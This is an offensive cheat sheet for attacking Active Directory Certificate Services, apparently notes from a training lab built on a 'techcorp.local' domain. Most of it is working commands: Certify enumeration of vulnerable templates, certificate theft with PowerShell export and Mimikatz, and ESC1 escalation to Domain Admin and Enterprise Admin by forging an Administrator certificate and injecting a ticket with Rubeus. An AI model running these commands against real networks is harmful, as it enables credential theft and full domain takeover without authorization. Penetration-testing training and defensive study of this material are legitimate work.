ADCS
Conditions of vulnerable certificate template which can be abused
CA grants normal/low privileged users enrollment rights
Manager approval is disabled
Authorization signatures are not required
target template grants normal/low privileged users enrollment rights
Enumerating - Active Directory certificate Service (ADCS)
Identify the ADCS service installation
Certify.exe cas
Enumerate the templates configured
Certify.exe find
Enumerate the vulnerable templates
Certify.exe find /vulnerable
If the enrolleeSuppliesSubject is not not allowed for all domain users, it wont show up in vulnerable template and needs to enumerated seperately (ESC1)
Certify.exe find /enrolleeSuppliesSubject
Persistance (THEFT-4): Extracting User and Machine certificates
List all certificates for local machine in certificate store
ls cert:\LocalMachine\My
Export the certificate in PFX format
ls cert:\LocalMachine\My\89C1171F6810A6725A47DB8D572537D736D4FF17 | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'niks' -Force -AsPlainText)
Use Mimikatz to export certificate in pfx format (default cert pass is mimikatz)
Invoke-mimikatz -Command "crypto::certificates /export" Invoke-mimikatz -Command "!crypto::certificates /systemstore:local_machine /export" cat cert.pfx | base64 -w 0 C:\AD\Tools\Rubeus.exe asktgt /user:nlamb /certificate:MNeg[...]IH0A== /password:mimikatz /nowrap /ptt
Escalation (ESC-1) : Domain User to Domain Admin and Enterprise Admin
CASE I: Domain Admin
Request certificate for DA user using ESC1 technique, and save it as cert.pem
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
Convert cert.pem to cert.pfx format
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx
Request TGT using pfx cerificate and inject into memory
Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:niks /nowrap /ptt
CASE II: Enterprise Admin
Request certificate for EA user using ESC1 technique
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
Convert cert.pem to cert.pfx format
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx
Request TGT using pfx cerificate and inject into memory
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:niks /nowrap /ptt
Last updated